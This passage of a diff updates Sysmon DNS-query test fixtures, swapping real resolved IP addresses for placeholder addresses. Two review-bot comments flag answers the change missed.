Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -6215,7 +6215,7 @@ "ProcessId": "2736", "QueryName": "cdn3.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;", + "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.357" }, 
@@ -6250,7 +6250,7 @@ "ProcessId": "2736", "QueryName": "rtb0.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.721", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -6273,7 +6273,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -6284,7 +6284,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6303,7 +6303,7 @@ "event_data": { "QueryName": "dev.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;", + "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.774", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6326,7 +6326,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -6352,7 +6352,7 @@ "ProcessId": "2736", "QueryName": "t.ssl.ak.dynamic.tiles.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;" + "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "pid": 2828, 
@@ -6365,7 +6365,7 @@ { "@timestamp": "2021-05-05T15:30:51.709Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
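Review bot: In the `@@ -6365` hunk the IPv6 answers (`2001:503:a83e::2:30` and the five that follow it) are left untouched while every IPv4 answer on the same line is rewritten, so the record still carries globally routable addresses after the change. If the test-IP policy this commit applies also covers IPv6, these need the same treatment, and the parsed copy in the `@@ -6381` hunk has to change in step so the `event.original` string and `winlog.event_data.QueryResults` stay in agreement.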
@@ -6381,7 +6381,7 @@ "event_data": { "QueryName": "rp.gwallet.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.943", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6408,7 +6408,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, 
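Review bot: `::ffff:98.138.49.44` survives unchanged in the rewritten `QueryResults` of the `@@ -6408` hunk while its three neighbours become `89.160.20.156`, which reads as an oversight rather than an intended exception; the same value is also left in the `@@ -6416` hunk. If it is meant to be replaced, both hunks need the identical edit so the `event.original` string and the parsed `QueryResults` describe the same answer set.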
@@ -6416,7 +6416,7 @@ "event_data": { "QueryName": "ads.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;", + "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.945", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6450,7 +6450,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6466,7 +6466,7 @@ "ProcessId": "2736", "QueryName": "um.simpli.fi", "QueryStatus": "0", - "QueryResults": "::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -6513,7 +6513,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.955", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
